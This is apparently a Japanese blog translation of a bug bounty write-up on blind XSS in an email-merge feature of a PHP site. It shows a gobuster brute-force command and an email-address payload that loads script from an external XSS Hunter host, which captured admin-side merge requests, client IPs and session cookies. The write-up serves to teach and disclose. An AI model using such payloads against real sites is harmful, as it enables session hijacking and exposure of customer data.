Shikata Ga Nai

Private? There is no such things.

Blind XSS in Email Field; 1000$ bountyを訳してみた

Hello there, ('ω')ノ

 

電子メール フィールドのブラインド XSSを。

 

脆弱性:

 ブラインド XSS

 

記事:

 https://yaseenzubair.medium.com/blind-xss-in-email-field-1000-bounty-b19b25a23236

 

ブラインド xss があるところには、常に xsshunter があり。

PHP で構築された Web サイトをテストしていて。

その Web サイトには、高度で重大な脆弱性に対してのみ 500 ~ 1000 ドルを。

支払う限定的なプログラムがあり。

そのため、ユーザ名の列挙やその他のバイパスなどの小さな問題は範囲外で。

assetfinder、sublist3r、gobuster を使用してサブドメインの。

Web サイトを列挙し始めましたが、興味深いものは見つからず。

次に、ディレクトリの総当たり攻撃を試みたところ。

/admin パスがステータス コード 200 を返して。

 

gobuster dir -u https://redacted.com/ -w /path/to/wordlist.txt -t 50

 

 

ページにアクセスすると、管理者ログイン ダッシュボードが表示され。

さまざまな種類の攻撃を試みましたが、すべて無駄で。

得たのは、管理パネルがユーザ名の列挙になりやすいということだけで。

そこで焦点を移し、XSS のテストを開始して。

 

XSS Hunter を使用すると、見逃されがちなブラインド XSS を含む。

あらゆる種類のクロスサイト スクリプティングの脆弱性を見つけることができ。

このサービスは、起動時にページをスキャンし。

脆弱なページに関する情報を XSS ハンター サービスに送信する特殊な。

XSS プローブをホストすることによって機能して。

 

そこで、Email-Merge request と呼ばれる Web サイトの機能に出くわし。

2 つのアカウントがあれば、管理者の承認を得てそれらを統合することができて。

“<script>alert(1)</script>”@xyz.com が受け入れられているかどうかに関係なく。

account-not-found エラーが返され。

そこで、Burpコラボレータを起動してアドレスをコピーし。

ペイロードを次のように作成して。


“><script src=https://xyz.xss.ht>”@subdomain.burpcollaborator.net


上記の電子メールを使用してサインアップし、コラボレータで受け取ったリンクを。

使用して電子メールを確認して。

その後、電子メールのリクエストを開始し、テストを続け。

セッション Cookie は httpOnly ではないことがわかり。

つまり、 XSS を取得するとセッションも取得されて。

 

XSS Hunter は魔法のように機能し、メールが受信トレイに届き。

他の顧客のデータの明らかな違反である現在のすべてのマージ要求が明らかになり。

それに伴い、クライアントの IP アドレスとその Cookie も取得されて。

 

Best regards, (^^ゞ